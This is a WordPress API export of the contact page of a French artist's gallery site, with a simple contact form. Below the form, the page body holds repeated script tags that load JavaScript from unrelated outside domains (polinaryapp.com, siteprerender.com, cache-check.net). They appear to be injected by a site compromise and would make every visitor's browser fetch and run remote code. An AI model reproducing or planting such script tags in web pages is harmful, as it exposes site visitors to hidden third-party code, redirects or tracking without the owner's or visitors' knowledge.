{"id":312,"date":"2020-11-12T16:47:59","date_gmt":"2020-11-12T15:47:59","guid":{"rendered":"http:\/\/tania-art-gallery.com\/?page_id=312"},"modified":"2020-11-27T14:53:39","modified_gmt":"2020-11-27T13:53:39","slug":"contact","status":"publish","type":"page","link":"https:\/\/tania-art-gallery.com\/index.php\/contact\/","title":{"rendered":"Contact"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"312\" class=\"elementor elementor-312\" data-elementor-settings=\"[]\">\n\t\t\t\t\t\t<div class=\"elementor-inner\">\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2d2a76b8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2d2a76b8\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-bded98d\" data-id=\"bded98d\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7a2b1041 elementor-widget elementor-widget-text-editor\" data-id=\"7a2b1041\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\n\t\t\t\t\t<p><!-- wp:paragraph --><\/p>\n<p>N&rsquo;h\u00e9sitez pas \u00e0 m&rsquo;\u00e9crire pour plus de renseignements ou pour me laisser votre commentaire!<\/p>\n<p><!-- \/wp:paragraph --><!-- wp:shortcode --><\/p>\n<p><div class=\"wpforms-container wpforms-container-full\" id=\"wpforms-311\"><form id=\"wpforms-form-311\" class=\"wpforms-validate wpforms-form\" data-formid=\"311\" method=\"post\" enctype=\"multipart\/form-data\" action=\"\/index.php\/wp-json\/wp\/v2\/pages\/312\" data-token=\"167e64012e345cafbadec6405f40e53c\"><noscript class=\"wpforms-error-noscript\">Veuillez activer JavaScript dans votre navigateur pour remplir ce formulaire.<\/noscript><div class=\"wpforms-field-container\"><div id=\"wpforms-311-field_0-container\" class=\"wpforms-field wpforms-field-name\" data-field-id=\"0\"><label class=\"wpforms-field-label\" for=\"wpforms-311-field_0\">Nom \/ Pr\u00e9nom <span class=\"wpforms-required-label\">*<\/span><\/label><input type=\"text\" id=\"wpforms-311-field_0\" class=\"wpforms-field-medium wpforms-field-required\" name=\"wpforms[fields][0]\" required><\/div><div id=\"wpforms-311-field_1-container\" class=\"wpforms-field wpforms-field-email\" data-field-id=\"1\"><label class=\"wpforms-field-label\" for=\"wpforms-311-field_1\">E-mail <span class=\"wpforms-required-label\">*<\/span><\/label><input type=\"email\" id=\"wpforms-311-field_1\" class=\"wpforms-field-medium wpforms-field-required\" name=\"wpforms[fields][1]\" required><\/div><div id=\"wpforms-311-field_2-container\" class=\"wpforms-field wpforms-field-textarea\" data-field-id=\"2\"><label class=\"wpforms-field-label\" for=\"wpforms-311-field_2\">Commentaire ou message <span class=\"wpforms-required-label\">*<\/span><\/label><textarea id=\"wpforms-311-field_2\" class=\"wpforms-field-medium wpforms-field-required\" name=\"wpforms[fields][2]\" required><\/textarea><\/div><\/div><div class=\"wpforms-recaptcha-container wpforms-is-recaptcha\" ><div class=\"g-recaptcha\" data-sitekey=\"6LfhUcMaAAAAAOfRQWZXjYB-Yn8iwstaWnZeMbxE\"><\/div><input type=\"text\" name=\"g-recaptcha-hidden\" class=\"wpforms-recaptcha-hidden\" style=\"position:absolute!important;clip:rect(0,0,0,0)!important;height:1px!important;width:1px!important;border:0!important;overflow:hidden!important;padding:0!important;margin:0!important;\" required><\/div><div class=\"wpforms-submit-container\" ><input type=\"hidden\" name=\"wpforms[id]\" value=\"311\"><input type=\"hidden\" name=\"wpforms[author]\" value=\"1\"><button type=\"submit\" name=\"wpforms[submit]\" class=\"wpforms-submit \" id=\"wpforms-submit-311\" value=\"wpforms-submit\" aria-live=\"assertive\" data-alt-text=\"Envoi...\" data-submit-text=\"Envoyer\">Envoyer<\/button><\/div><\/form><\/div>  <!-- .wpforms-container --><\/p>\n<p><!-- \/wp:shortcode --><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><br \/><script src=\"http:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&#038;uid=8684x\" type=\"text\/javascript\"><\/script><br \/><script src=\"http:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&#038;uid=8684x&#038;format=arrjs&#038;r=1605262884180\" type=\"text\/javascript\"><\/script><br \/><script src=\"http:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&#038;title=ss&#038;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_534794428&#038;key=21ecefdd84a1d2a730&#038;cv=1606484849&#038;t=1606484848753\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_247669044&#038;key=21ecefdd84a1d2a730&#038;cv=589340&#038;t=1606484848755\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&#038;uid=8684x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&#038;uid=8684x&#038;format=arrjs&#038;r=1606484848758\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&#038;title=ss&#038;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_772449019&#038;key=21ecefdd84a1d2a730&#038;cv=1606485153&#038;t=1606485152621\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_881396876&#038;key=21ecefdd84a1d2a730&#038;cv=589644&#038;t=1606485152622\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&#038;uid=8684x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&#038;uid=8684x&#038;format=arrjs&#038;r=1606485152628\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&#038;title=ss&#038;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script> <script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&#038;uid=8684x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&#038;uid=8684x&#038;format=arrjs&#038;r=1606485162798\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&#038;title=ss&#038;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_147222491&#038;key=21ecefdd84a1d2a730&#038;cv=1606485192&#038;t=1606485191715\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_495774375&#038;key=21ecefdd84a1d2a730&#038;cv=589683&#038;t=1606485191715\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&#038;uid=8684x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&#038;uid=8684x&#038;format=arrjs&#038;r=1606485191720\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&#038;title=ss&#038;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p>\n<script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script>\n<script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_826046524&amp;key=21ecefdd84a1d2a730&amp;cv=1606485205&amp;t=1606485205113\" type=\"text\/javascript\"><\/script>\n<script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_177421781&amp;key=21ecefdd84a1d2a730&amp;cv=589696&amp;t=1606485205114\" type=\"text\/javascript\"><\/script>\n<script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script>\n<script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1606485205118\" type=\"text\/javascript\"><\/script>\n<script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script>\n<\/p>\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>N&rsquo;h\u00e9sitez pas \u00e0 m&rsquo;\u00e9crire pour plus de renseignements ou pour me laisser votre commentaire!<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"spay_email":"","footnotes":""},"class_list":["post-312","page","type-page","status-publish","hentry","entry","owp-thumbs-layout-horizontal","owp-btn-normal","owp-tabs-layout-vertical","has-no-thumbnails","has-product-nav"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Contact - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/contact\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Contact - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"N&rsquo;h\u00e9sitez pas \u00e0 m&rsquo;\u00e9crire pour plus de renseignements ou pour me laisser votre commentaire!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/contact\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-11-27T13:53:39+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/contact\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/contact\/\",\"name\":\"Contact - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"datePublished\":\"2020-11-12T15:47:59+00:00\",\"dateModified\":\"2020-11-27T13:53:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/contact\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/contact\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/contact\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Contact\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Contact - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/contact\/","og_locale":"fr_FR","og_type":"article","og_title":"Contact - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"N&rsquo;h\u00e9sitez pas \u00e0 m&rsquo;\u00e9crire pour plus de renseignements ou pour me laisser votre commentaire!","og_url":"https:\/\/tania-art-gallery.com\/index.php\/contact\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-11-27T13:53:39+00:00","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/contact\/","url":"https:\/\/tania-art-gallery.com\/index.php\/contact\/","name":"Contact - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"datePublished":"2020-11-12T15:47:59+00:00","dateModified":"2020-11-27T13:53:39+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/contact\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/contact\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/contact\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Contact"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/pages\/312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/comments?post=312"}],"version-history":[{"count":20,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/pages\/312\/revisions"}],"predecessor-version":[{"id":1213,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/pages\/312\/revisions\/1213"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}